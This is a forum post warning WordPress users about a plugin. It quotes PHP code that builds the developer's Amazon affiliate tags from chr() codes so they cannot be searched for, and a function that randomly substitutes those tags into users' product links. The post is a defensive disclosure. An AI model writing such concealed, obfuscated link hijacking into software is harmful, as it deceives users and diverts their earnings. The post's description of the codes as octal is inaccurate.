Scam, vulnerable code! Read description! Don’t install!

  • Their amazon affiliate id is pwpnaaa0f-20 . They use a hacking code in their plugin includes/naaa-functions.php file. You can not find their id because they are using php chr() function, using the octal value to add the ASCII Character. Here is the code.

    unction naaa_get_gat($market){
	$market = strtolower($market);
	if ($market == 'ca'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(48));
	}else if ($market == 'de'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(49));
	}else if ($market == 'es' || empty($market)){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(55).chr(45).chr(50).chr(49));
	}else if ($market == 'fr'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(50).chr(45).chr(50).chr(49));
	}else if ($market == 'gb'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(57).chr(45).chr(50).chr(49));
	}else if ($market == 'it'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(49));
	}else if ($market == 'jp'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(50));
	}else if ($market == 'us'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(99).chr(45).chr(50).chr(48));
	}else if ($market == 'mx'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(53).chr(45).chr(50).chr(48));
	}else if ($market == 'br'){
		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(51).chr(45).chr(50).chr(48));
	}
	return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(55).chr(45).chr(50).chr(49));
}

    also they using random function to add their affiliate id to your products.

    function naaa_get_finalist($first, $second){
	if (random_int(1, 100) > 7){
		return $first;
	}else{
		return $second;
	}
}

    Hope this message would help to avoid such scammers.

    Be safe.

  • The topic ‘Scam, vulnerable code! Read description! Don’t install!’ is closed to new replies.